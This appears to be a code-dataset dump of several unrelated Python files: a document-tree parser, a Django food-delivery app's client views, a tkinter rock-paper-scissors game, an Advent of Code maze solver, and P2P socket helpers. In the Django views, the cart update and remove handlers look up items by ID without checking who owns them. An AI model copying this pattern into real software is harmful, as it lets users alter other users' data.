= self.get_text_without_marks() + ' '\n if text.startswith('['):\n closed_scope_position = text.find('] ')\n if closed_scope_position > 2:\n tag = text[1: closed_scope_position]\n tag = tag.lower()\n tag.replace(SPACE, '_')\n return tag\n\n def get_text_without_marks_and_tags(self):\n tag = self.get_tag()\n if tag:\n return self.get_text_without_marks()[len(tag) + 3:]\n else:\n return self.get_text_without_marks()\n\n def has_name(self):\n text = self.get_text_without_marks_and_tags()\n if (text or SPACE)[0] == '(':\n closed_scope_position = text.find(')')\n if closed_scope_position > 2:\n return text[1: closed_scope_position]\n for divider in NAME_DIVIDERS:\n if divider in text:\n text = text.split(divider)[0]\n if len(text) < 20:\n return text\n\n def get_name(self):\n text = self.get_text_without_marks_and_tags()\n if (text or SPACE)[0] == '(':\n closed_scope_position = text.find(') ')\n if closed_scope_position > 2:\n text = text[1: closed_scope_position]\n for divider in NAME_DIVIDERS:\n if divider in text:\n text = text.split(divider)[0]\n splitted_text = text.split(SPACE)\n if len(splitted_text) > MAX_WORDS_IN_NAME:\n text = SPACE.join(splitted_text[:MAX_WORDS_IN_NAME])\n text = text.lower()\n text.replace(SPACE, '_')\n text = transliterate(text)\n return text\n\n def get_content(self):\n text = self.get_text_without_marks_and_tags()\n name = self.has_name()\n if name:\n return text[len(name) + 3:]\n else:\n return text\n\n\nNative = Paragraph\n\n\nclass Tree(Paragraph):\n def __init__(\n self,\n text,\n level=0,\n name=None,\n subtrees=tuple(),\n ):\n Paragraph.__init__(self, text, level)\n self.name = name\n if subtrees:\n self.subtrees = list(subtrees)\n else:\n self.set_hiertext(text, including_title=True)\n\n def get_depth(self):\n max_depth = -1\n for subtree in self.subtrees:\n cur_depth = subtree.get_depth()\n if cur_depth > max_depth:\n max_depth = cur_depth\n return max_depth + 1\n\n def get_last_subtree(self):\n if self.subtrees:\n return self.subtrees[-1]\n\n def get_last_subtree_level(self):\n last_subtree = self.get_last_subtree()\n if last_subtree:\n return last_subtree.level\n\n def get_last_level(self):\n last_subtree_level = self.get_last_subtree_level()\n if last_subtree_level is not None:\n return last_subtree_level\n else:\n return self.level\n\n def get_mark(self, standard_only=True):\n return self.get_title_paragraph().get_mark(standard_only)\n\n def remove_commented_subtrees(self, markers=SKIP_MARKERS):\n for subtree in self.subtrees:\n if subtree.get_mark() in markers:\n self.subtrees.remove(subtree)\n print('removed:', subtree.get_title_paragraph().text)\n else:\n subtree.remove_commented_subtrees(markers)\n\n def add_paragraph(self, paragraph):\n last_subtree_level = self.get_last_subtree_level()\n if (last_subtree_level is not None) and (paragraph.level > last_subtree_level):\n last_subtree = self.get_last_subtree()\n last_subtree.add_paragraph(paragraph)\n else:\n new_subtree = Tree(paragraph.text, paragraph.level)\n self.subtrees.append(new_subtree)\n\n def add_line(self, text, level=0):\n paragraph = Paragraph(text, level)\n self.add_paragraph(paragraph)\n\n def add_dict_obj(self, obj: dict) -> Native:\n pass\n\n def add_yaml_text(self, lines: Iterable) -> Native:\n yaml_data = yaml.safe_load(lines)\n for obj in yaml_data:\n assert isinstance(obj, dict)\n self.add_dict_obj(obj)\n return self\n\n def add_hiertext(self, hiertext, replace_tab=True, skip_commented=True):\n for line in split_lines(hiertext):\n if replace_tab and line.startswith('\\t'):\n line = line.replace('\\t', SPACE * INDENT_STEP)\n self.add_line(line)\n if skip_commented:\n self.remove_commented_subtrees()\n\n def set_hiertext(self, hiertext, including_title=False):\n lines = list(split_lines(hiertext))\n if including_title:\n title = lines[0]\n self.text = title\n lines = lines[1:]\n self.subtrees = list()\n self.add_hiertext(lines)\n\n def get_title_text(self):\n return self.text\n\n def get_title_paragraph(self) -> Paragraph:\n return Paragraph(self.text, self.level)\n\n def get_hiertext(self):\n yield self.get_title_paragraph().get_line()\n for subtree in self.subtrees:\n for line in subtree.get_hiertext():\n yield line\n\n def get_subtrees_count(self):\n return len(self.subtrees)\n\n def get_lines_count(self):\n lines_count = 1\n for subtree in self.subtrees:\n lines_count += subtree.get_lines_count()\n return lines_count\n\n def get_paragraphs(self):\n yield self.get_title_paragraph()\n for subtree in self.subtrees:\n for paragraph in subtree.get_paragraphs():\n yield paragraph\n\n def get_markdown(self, rules=DEFAULT_RULES):\n for paragraph in self.get_paragraphs():\n markdown_lines = paragraph.get_markdown(rules)\n for line in markdown_lines:\n yield line\n\n @staticmethod\n def get_detected_doctype_by_filename(filename: str, default: Optional[str] = None) -> str:\n extension = filename.split('.')[-1]\n if extension in ('txt', 'yaml'):\n doctype = extension\n return doctype\n elif default:\n return default\n else:\n raise ValueError\n\n def from_file(self, filename: str, doctype: str = None) -> Native:\n if doctype is None:\n doctype = self.get_detected_doctype_by_filename()\n file_holder = open(filename, 'r', encoding='utf-8')\n if doctype == 'txt':\n self.add_hiertext(file_holder)\n elif doctype == 'yaml':\n self.add_yaml(file_holder)\n else:\n raise ValueError\n file_holder.close()\n return self\n\n def get_first_level_lines(self):\n for subtree in self.subtrees:\n yield subtree.get_title_paragraph()\n\n def get_item(self, as_link_from=None, link_type=cs.LinkType.Reference):\n cur = self.get_title_paragraph()\n tag = cur.get_tag()\n name = cur.get_name()\n caption = cur.get_content()\n titles = caption.split(' = ')\n print('Parsing row: [{}] ({}) \"{}\"'.format(tag, name, caption))\n item = cs.Node(name, titles=titles)\n for subtree in self.subtrees:\n assert isinstance(subtree, Tree)\n p = subtree.get_title_paragraph()\n p_marker = p.get_mark()\n p_tag = p.get_tag()\n p_name = p.get_name()\n p_text = p.get_content()\n print('....p_marker={}, p_tag={}, p_name={}, p_name={}'.format(p_marker, p_tag, p_name, p_text))\n if p_tag in ('parent', 'category', 'cat'):\n item.add_link_by_name(p_name, caption=p_text, link_type=cs.LinkType.Parent)\n elif p_marker == '=' or p_tag in ('child', 'children', 'struct', 'structure'):\n if p_text.endswith(':') or not p_text: # and subtree.get_depth() > 1:\n item.add_content_block(cs.Block(p_text, cs.BlockType.Struct))\n for element in subtree.subtrees:\n link = element.get_node(as_link_from=item, link_type=cs.LinkType.Child)\n item.add_content_item(link.copy(), block_type=cs.BlockType.Struct)\n else:\n link = subtree.get_item(as_link_from=item, link_type=cs.LinkType.Child)\n item.add_content_item(link.copy(), block_type=cs.BlockType.Struct)\n elif p_tag == 'usage':\n if p_text.endswith(':'): # and subtree.get_depth() > 1:\n for element in subtree.subtrees:\n e_name = element.get_name()\n e_text = element.get_content()\n item.add_link_by_name(e_name, e_text, link_type=cs.LinkType.Usage, create_node=True)\n else:\n item.add_link_by_name(p_name, p_text, link_type=cs.LinkType.Usage, create_node=True)\n else:\n for t in subtree.get_hiertext():\n item.add_content_item(t, block_type=cs.BlockType.Info)\n if as_link_from:\n link = cs.Link.build_link_from_nodes(as_link_from, item, link_type=link_type, caption=caption)\n return link\n else:\n return item\n\n# class Page(object):\n# # <...>\n# pass\n","repo_name":"az365/semadoc","sub_path":"hierdoc.py","file_name":"hierdoc.py","file_ext":"py","file_size_in_byte":11895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9519162283","text":"import json\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.db import IntegrityError\r\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\r\nfrom django.shortcuts import render\r\nfrom django.urls import reverse\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.core.paginator import Paginator\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.template.defaulttags import register\r\nfrom django.db.models import Sum\r\n\r\nfrom client_app.models import Old_orders, User, Cart\r\nfrom deliveryperson_app.models import Order\r\nfrom restaurant_app.models import Food\r\n\r\n\r\n@register.filter\r\ndef usd(value):\r\n \"\"\"Format value as USD.\"\"\"\r\n return f\"${value:,.2f}\"\r\n\r\n\r\ndef index(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse(\"client_app:home\"))\r\n return render(request, \"client_app/index.html\")\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef home(request):\r\n\r\n # check if user is restaurant\r\n if request.user.is_restaurant is True:\r\n return HttpResponseRedirect(reverse(\"restaurant_app:index\"))\r\n\r\n # check if user is deliveryperson\r\n if request.user.is_deliveryperson is True:\r\n return HttpResponseRedirect(reverse(\"deliveryperson_app:index\"))\r\n\r\n # get all restaurants\r\n restaurantss = User.objects.filter(is_restaurant=True, is_superuser=False)\r\n paginator = Paginator(restaurantss, 12)\r\n page_number = request.GET.get('page')\r\n restaurants = paginator.get_page(page_number)\r\n\r\n return render(request, \"client_app/home.html\", {\r\n \"restaurants\": restaurants,\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef restaurant(request, res):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"U must be client to access this page\"\r\n })\r\n\r\n # check if restaurant exist\r\n try:\r\n restaurant = User.objects.get(username=res)\r\n except ObjectDoesNotExist:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"restaurant doesn't exist\"\r\n })\r\n\r\n # check if it's restaurant\r\n if restaurant.is_restaurant is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"restaurant doesn't exist\"\r\n })\r\n\r\n # get food\r\n food = Food.objects.filter(restaurant=restaurant)\r\n\r\n # render page with data\r\n return render(request, \"client_app/restaurant_page.html\", {\r\n \"food\": food,\r\n \"restaurant\": restaurant,\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef cart(request):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to see cart items\"}, status=400)\r\n\r\n # get user cart\r\n cart = Cart.objects.filter(user=request.user)\r\n\r\n # get sum cart price\r\n sum_price_cart = cart.aggregate(Sum('sum_price'))['sum_price__sum']\r\n\r\n # render cart page with data\r\n return render(request, \"client_app/cart.html\", {\r\n \"cart\": cart,\r\n \"sum_price_cart\": sum_price_cart,\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef sum_cart(request):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user see cart sum\"}, status=400)\r\n\r\n # get sum of cart\r\n sum_cart = Cart.objects.filter(user=request.user).aggregate(Sum('n'))['n__sum']\r\n\r\n # if it's empty return 0\r\n if not sum_cart:\r\n sum_cart = 0\r\n\r\n # return sum_cart\r\n return JsonResponse({\"sum\": sum_cart}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef add_cart(request, food_id):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to add items to cart\"}, status=400)\r\n\r\n # check if there's n\r\n data = json.loads(request.body)\r\n nn = [n.strip() for n in data.get(\"n\").split(\",\")]\r\n\r\n # if it's empty return error\r\n if nn == [\"\"]:\r\n return JsonResponse({\"error\": \"Must Provide Post n\"}, status=400)\r\n\r\n # get n\r\n n = data.get(\"n\", \"\")\r\n\r\n # make sure n and food_id is number\r\n if str(n).isdigit() is False or str(food_id).isdigit() is False:\r\n return JsonResponse({\"error\": f\"Error1\"}, status=400)\r\n \r\n n = int(n)\r\n food_id = int(food_id)\r\n\r\n # make sure n and food_id is not 0\r\n if n == 0 or food_id == 0:\r\n return JsonResponse({\"error\": \"Error2\"}, status=400)\r\n\r\n # make sure food exist\r\n try:\r\n food = Food.objects.get(pk=food_id)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({\"error\": \"food doesn't exist\"}, status=400)\r\n\r\n # get user cart\r\n cart = Cart.objects.filter(user=request.user)\r\n\r\n # calculate sum\r\n sum_price = round(food.price * n, 2)\r\n\r\n # if item already in cart update n and sum\r\n try:\r\n in_cart = Cart.objects.get(user=request.user, item=food)\r\n in_cart.n = in_cart.n + n\r\n in_cart.sum_price = in_cart.sum_price + sum_price\r\n in_cart.save()\r\n return JsonResponse({\"success\": \"Added successfully\"}, status=201)\r\n except ObjectDoesNotExist:\r\n pass\r\n\r\n # if cart is empty add item to it\r\n if not cart:\r\n\r\n # add item to db\r\n item = Cart(user=request.user, item=food, n=n, sum_price=sum_price)\r\n item.save()\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Added successfully\"}, status=201)\r\n \r\n # if cart is not empty check if the item from the same restaurant\r\n else:\r\n\r\n # check\r\n if cart.first().item.restaurant.id != food.restaurant.id:\r\n return JsonResponse({\"error\": \"All items in cart must be from the same restaurant.\"}, status=400)\r\n\r\n # add item to db\r\n item = Cart(user=request.user, item=food, n=n, sum_price=sum_price)\r\n item.save()\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Added successfully\"}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef update_cart(request, cart_id):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\r\n \r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to update items in cart\"}, status=400)\r\n\r\n # check if there's n\r\n data = json.loads(request.body)\r\n nn = [n.strip() for n in data.get(\"n\").split(\",\")]\r\n\r\n # if it's empty return error\r\n if nn == [\"\"]:\r\n return JsonResponse({\"error\": \"Must Provide Post n\"}, status=400)\r\n\r\n # get n\r\n n = data.get(\"n\", \"\")\r\n\r\n # make sure n and cart_id is number\r\n if str(n).isdigit() is False or str(cart_id).isdigit() is False:\r\n return JsonResponse({\"error\": f\"Error1\"}, status=400)\r\n\r\n n = int(n)\r\n cart_id = int(cart_id)\r\n\r\n # make sure n and cart_id is not 0\r\n if n == 0 or cart_id == 0:\r\n return JsonResponse({\"error\": \"Error2\"}, status=400)\r\n\r\n # make sure cart item exist\r\n try:\r\n cart_item = Cart.objects.get(pk=cart_id)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({\"error\": \"food is not in cart\"}, status=400)\r\n\r\n # calculate sum\r\n sum_price = round(cart_item.item.price * n, 2)\r\n\r\n # update db\r\n cart_item.n = n\r\n cart_item.sum_price = sum_price\r\n cart_item.save()\r\n\r\n # get sum of cart\r\n sum_cart = Cart.objects.filter(user=request.user).aggregate(Sum('sum_price'))['sum_price__sum']\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Updated successfully\", \"sum_cart\": sum_cart, \"sum_price\": usd(cart_item.sum_price)}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef remove_cart(request, cart_id):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to delete items from cart\"}, status=400)\r\n\r\n # make cart_id is number\r\n if str(cart_id).isdigit() is False:\r\n return JsonResponse({\"error\": f\"Error1\"}, status=400)\r\n\r\n cart_id = int(cart_id)\r\n\r\n # cart_id is not 0\r\n if cart_id == 0:\r\n return JsonResponse({\"error\": \"Error2\"}, status=400)\r\n\r\n # make sure cart item exist\r\n try:\r\n cart_item = Cart.objects.get(pk=cart_id)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({\"error\": \"food is not in cart\"}, status=400)\r\n\r\n # delete from db\r\n cart_item.delete()\r\n\r\n # get sum of cart\r\n sum_cart = Cart.objects.filter(user=request.user).aggregate(Sum('n'))['n__sum']\r\n\r\n # if cart is empty return 0\r\n if not sum_cart:\r\n sum_cart = 0\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Removed successfully\", \"sum_cart\": sum_cart}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef place_order(request):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"Request Error\"\r\n })\r\n \r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"U must be client to access this page\"\r\n })\r\n\r\n # check if there is already order\r\n try:\r\n Order.objects.get(user=request.user)\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"there is already order in pending please wait for order to end or cancel order if possible\"\r\n })\r\n except ObjectDoesNotExist:\r\n pass\r\n\r\n # get user cart\r\n cart = Cart.objects.filter(user=request.user)\r\n\r\n # check if cart is empty\r\n if not cart:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"Cart is empty\"\r\n })\r\n\r\n # get cart items and numbers\r\n items = cart.only(\"item\", \"n\")\r\n\r\n # create list for order\r\n order = []\r\n\r\n # loop through items and add the order to single list\r\n for i in items:\r\n order.append(f\"{i.n} {i.item.food}\")\r\n \r\n # make the list single big string with white space at the end\r\n order = \" - \".join(order)\r\n\r\n # get restaurant\r\n restaurant = items.first().item.restaurant\r\n\r\n # get sum price cart\r\n sum_price_cart = cart.aggregate(Sum('sum_price'))['sum_price__sum']\r\n\r\n # save order to db\r\n new_order = Order(restaurant=restaurant, user=request.user, order=order, sum_order=sum_price_cart)\r\n new_order.save()\r\n\r\n # empty the cart\r\n cart.delete()\r\n\r\n # redirect user to live order page\r\n return HttpResponseRedirect(reverse(\"client_app:live_order\"))\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef live_order(request):\r\n \r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"you must be client to access this page\"\r\n })\r\n\r\n # get order\r\n try:\r\n order = Order.objects.get(user=request.user)\r\n except ObjectDoesNotExist:\r\n # if there is no order assign order to none\r\n order = None\r\n \r\n # render page with data\r\n return render(request, \"client_app/order.html\", {\r\n \"order\": order\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef cancel_order(request):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"Request Error\"\r\n })\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"you must be client to access this page\"\r\n })\r\n\r\n\r\n # check if there is order\r\n try:\r\n order = Order.objects.get(user=request.user)\r\n except ObjectDoesNotExist:\r\n return render(request, \"client_app/error.html\", {\r\n \"message\": \"No order\"\r\n })\r\n\r\n\r\n # if order got accepted return error\r\n if order.is_active is True:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"You can't cancel order when accepted\"\r\n })\r\n \r\n # remove order from db\r\n else:\r\n order.delete()\r\n \r\n # redirect to same page\r\n return HttpResponseRedirect(reverse(\"client_app:live_order\"))\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef old_orders(request):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"you must be client to access this page\"\r\n })\r\n\r\n # get old orders\r\n old_orders = Old_orders.objects.filter(user=request.user)\r\n\r\n # render template with data\r\n return render(request, \"client_app/old_orders.html\", {\r\n \"old_orders\": old_orders,\r\n })\r\n\r\n\r\ndef login_view(request):\r\n if request.method == \"POST\":\r\n\r\n # Attempt to sign user in\r\n username = request.POST[\"username\"]\r\n password = request.POST[\"password\"]\r\n user = authenticate(request, username=username, password=password)\r\n\r\n # Check if authentication successful\r\n if user is not None:\r\n\r\n # check if user is client\r\n if user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"U must be client to login\"\r\n })\r\n \r\n login(request, user)\r\n return HttpResponseRedirect(reverse(\"client_app:home\"))\r\n else:\r\n return render(request, \"client_app/login.html\", {\r\n \"message\": \"Invalid username and/or password.\"\r\n })\r\n else:\r\n return render(request, \"client_app/login.html\")\r\n\r\n\r\ndef logout_view(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse(\"client_app:index\"))\r\n\r\n\r\ndef register(request):\r\n if request.method == \"POST\":\r\n\r\n # get inputs from user\r\n username = request.POST[\"username\"]\r\n email = request.POST[\"email\"]\r\n address = request.POST[\"address\"]\r\n image = request.POST.get(\"image\", \"\")\r\n number = request.POST[\"number\"]\r\n\r\n # errors cheking\r\n if not username or not email or not address or not number:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Must fill all fields except image\"\r\n })\r\n\r\n if image:\r\n if len(image) > 200:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Image url is too long\"\r\n })\r\n\r\n # Ensure password matches confirmation\r\n password = request.POST[\"password\"]\r\n confirmation = request.POST[\"confirmation\"]\r\n if password != confirmation:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Passwords must match.\"\r\n })\r\n\r\n # Attempt to create new user\r\n try:\r\n if image:\r\n user = User.objects.create_user(username, email, password)\r\n user.address = address\r\n user.image = image\r\n user.number = number\r\n user.is_client = True\r\n else:\r\n user = User.objects.create_user(username, email, password)\r\n user.address = address\r\n user.number = number\r\n user.is_client = True\r\n user.save()\r\n except IntegrityError:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Username already taken.\"\r\n })\r\n login(request, user)\r\n return HttpResponseRedirect(reverse(\"client_app:home\"))\r\n else:\r\n return render(request, \"client_app/register.html\")\r\n","repo_name":"OsamahAj1/food_delivery","sub_path":"client_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38134010470","text":"import tkinter\nfrom tkinter import ttk, messagebox\nfrom random import randrange\n\nfirst_play = True\nlast_game = 2\nroot = tkinter.Tk()\ncomputer_choice = 0\n\ndifficulty_choice = messagebox.askyesno(title = \"Difficulty Choice\", message = \"Activate Hard Mode?\")\n\nratio = [0, 0, 0] #wins, losses, ties\ncomputer_choices = {1: \"rock\", 2: \"paper\", 0: \"scissors\"}\ninterface = ttk.Label(root, text = \"Press a Button!\")\nratio_label = ttk.Label(root, text = \"This label will show your W/L ratio.\")\ncomputer_label = ttk.Label(root, text = \"This label will show what the computer chooses.\")\n\ndef choice(number):\n global first_play\n global last_game\n global computer_choice\n if difficulty_choice == False or first_play == True or last_game == 2:\n computer_choice = randrange(1, 4)\n computer_label.config(text = \"Computer chose: \" + computer_choices[int((computer_choice + 1) % 3)])\n print(computer_choice)\n if (computer_choice % 3) == number:\n interface.config(text = \"It's a tie!\")\n ratio[2] += 1\n last_game = 2\n elif (computer_choice % 3) == (number - 1):\n interface.config(text = \"You win!\")\n ratio[0] += 1\n last_game = 0\n computer_choice += 1\n else:\n interface.config(text = \"You lose!\")\n ratio[1] += 1\n last_game = 1\n computer_choice += 2\n ratio_label.config(text = \"Wins: \" + str(ratio[0]) + \" Losses: \" + str(ratio[1]) + \" Ties: \" + str(ratio[2]))\n first_play = False\n\nRock = ttk.Button(root, text = \"Rock!\", command = lambda: choice(0))\nPaper = ttk.Button(root, text = \"Paper!\", command = lambda: choice(1))\nScissors = ttk.Button(root, text = \"Scissors!\", command = lambda: choice(2))\n\ncomputer_label.grid(row = 1, column = 0, columnspan = 3, stick = \"nsew\")\ninterface.grid(row = 0, column = 0, columnspan = 3, stick = \"nsew\")\nratio_label.grid(row = 2, column = 0, columnspan = 3, stick = \"nsew\")\nRock.grid(row = 3, column = 0)\nPaper.grid(row = 3, column = 1)\nScissors.grid(row = 3, column = 2)\nroot.mainloop()","repo_name":"danielkim0-highschool/Assorted-Python-Projects","sub_path":"RPS.py","file_name":"RPS.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4259472531","text":"from collections import deque\n\n# (x+y)*(x+y) = x*x + 2*x*y + y*y\n# f(x, y) = x*x + 3*x + 2*x*y + y + y*y = (x+y)**2 + 3*x + y\n#\n# f(x+1, y) = (x+y+1)**2 + 3*(x+1) + y\n# = (x+y)**2 + 2*(x+y) + 1 + 3*x + 3 + y\n# = (x+y)**2 + 3*x + y + 2*(x+y) + 4\n# = f(x, y) + 2*(x+y+2)\n#\n# => f(x, y) = f(x+1, y) - 2*(x+y+2)\n# => f(x-1, y) = f(x, y) - 2*(x+y+1)\n#\n# f(x, y+1) = (x+y+1)**2 + 3*x + y + 1\n# = (x+y)**2 + 2*(x+y) + 1 + 3*x + y + 1\n# = (x+y)**2 + 3*x + y + 2*(x+y) + 2\n# = f(x, y) + 2*(x+y+1)\n#\n# => f(x, y) = f(x, y+1) - 2*(x+y+1)\n# => f(x, y-1) = f(x, y) - 2*(x+y)\n\ndef f_xy(x, y):\n\treturn x*x + 3*x + 2*x*y + y + y*y\n\ndef solve(n, start_xy, end_xy=None):\n\tbits = {}\n\tseen = set()\n\n\tq = deque()\n\tq.append((0, *start_xy, n + f_xy(*start_xy)))\n\n\twhile q:\n\t\tsteps, x, y, n = q.popleft()\n\n\t\toddbits = bits.get(n)\n\t\tif oddbits is None:\n\t\t\toddbits = False\n\t\t\tm = n\n\t\t\twhile m:\n\t\t\t\tm &= m - 1\n\t\t\t\toddbits = not oddbits\n\t\t\tbits[n] = oddbits\n\t\tif oddbits:\n\t\t\tcontinue\n\n\t\txy = (x, y)\n\t\tif xy in seen:\n\t\t\tcontinue\n\t\tseen.add(xy)\n\n\t\tif end_xy:\n\t\t\tif xy == end_xy:\n\t\t\t\treturn steps\n\t\telif steps == 50:\n\t\t\tcontinue\n\n\t\tsteps += 1\n\t\txy = 2*(x+y)\n\n\t\tq.append((steps, x+1, y, n+xy+4))\n\t\tq.append((steps, x, y+1, n+xy+2))\n\t\tif y: q.append((steps, x, y-1, n-xy))\n\t\tif x: q.append((steps, x-1, y, n-xy-2))\n\n\treturn None if end_xy else len(seen)\n\ndef main():\n\tprint('Example Part 1:', solve(10, (1, 1), (7, 4)))\n\tprint('Example Part 2:', solve(10, (1, 1)))\n\tprint('Part 1:', solve(1352, (1, 1), (31, 39)))\n\tprint('Part 2:', solve(1352, (1, 1)))\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"nightjuggler/aoc","sub_path":"2016/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5829835441","text":"\nfrom Packet import Packet, PacketType\nimport socket\n\nLOG_LEVEL = 2\t# higher number -> more log\nMSG_SIZE = 1024\n\nclass bcolors:\n\tPINK = '\\033[95m'\n\tBLUE = '\\033[94m'\n\tCYAN = '\\033[96m'\n\tGREEN = '\\033[92m'\n\tORANGE = '\\033[93m'\n\tRED = '\\033[91m'\n\tNORMAL = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\ndef dprint(*args, level=1):\n\tif LOG_LEVEL >= level:\n\t\tif level == 1:\n\t\t\tprint(bcolors.GREEN, *args, bcolors.NORMAL)\n\t\telif level == 2:\n\t\t\tprint(bcolors.BLUE, *args, bcolors.NORMAL)\n\t\telse:\n\t\t\tprint(bcolors.PINK, *args, bcolors.NORMAL)\n\nclass BaseSenderReceiver:\n\tdef send(self, socket: socket.SocketType, msg, addr=None):\n\t\tdprint(f\"Send message to peer {addr if addr else socket.getpeername()} msg: {msg}\", level=2)\n\t\tmsg = msg.encode(\"ascii\")\n\t\tif not addr:\n\t\t\tsocket.send(msg)\n\t\telse:\n\t\t\tsocket.sendto(msg, addr)\n\n\tdef receive(self, socket: socket.SocketType):\n\t\tmsg = socket.recv(MSG_SIZE).decode(\"ascii\")\n\t\tmsg = msg.strip()\n\t\tif msg:\n\t\t\tdprint(f\"Got message from peer {socket.getpeername()}: {msg}\")\n\t\treturn msg\n\n\tdef send_packet(self, socket: socket.SocketType, packet: Packet, addr=None):\t\n\t\tself.send(socket, packet.__str__(), addr)\n\n\tdef receive_packet(self, socket) -> Packet:\n\t\tmsg = self.receive(socket)\n\t\tif not msg:\n\t\t\treturn None\n\t\tsplited = msg.split('|')\n\t\tpacket = Packet(PacketType.get_packet_type_from_code(splited[0]), splited[1], splited[2], splited[3])\n\t\treturn packet\n\n\tdef receive_packet_udp(self, socket: socket.SocketType):\n\t\tmsg, address = socket.recvfrom(MSG_SIZE)\n\t\tif not msg:\n\t\t\treturn None\n\t\tmsg = msg.decode(\"ascii\")\n\t\tmsg = msg.strip()\n\t\tdprint(f\"Got message from peer {address}: {msg}\")\n\t\tsplited = msg.split('|')\n\t\tpacket = Packet(PacketType.get_packet_type_from_code(splited[0]), splited[1], splited[2], splited[3])\n\t\treturn packet, address\n","repo_name":"mahsaama/P2P-Network","sub_path":"commons.py","file_name":"commons.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29790214204","text":" \ndef col(w):\n color={'red' : 'ສິແດງ',\n 'green' : 'ສີຂຽວ',\n 'blue' : 'ສີຟ້າ',\n 'yellow':'ສີເຫຼືອງ',\n 'purple':'ສີມ່ວງ',\n 'black':'ສີດຳ',\n 'white':'ສີຂາວ',\n 'orange':'ສີສົ້ມ',\n 'pink':'ສີບົວ',\n 'gray':'ສີຂີ້ເຖົ່າ',\n 'brow':'ສີຕັບໝູ',\n 'cyan':'ສີທະເລ',}\n print(f'Translate : {color.get(w,\"Not found\")}')\ndef col2(w):\n colors = {'ສີແດງ': \"red\",\n 'ສີຂຽວ' : \"green\",\n 'ສີຟ້າ' : \"blue\",\n 'ສີເຫຼືອງ' : \"yellow\",\n 'ສີມ້ວງ' : \"purple\",\n 'ສີດຳ' : \"black\",\n 'ສີຂາວ' : \"white\",\n 'ສີສົ້ມ' : \"orange\",\n 'ສີບົວ' : \"pink\",\n 'ສີຊົມພູ': \"pink\",\n 'ສີຂີ້ເຖົ່າ' : \"gray\",\n 'ສີຕັບໝູ' : \"brow\",\n 'ສີທະເລ' : \"cyan\",}\n print(f'ແປ : 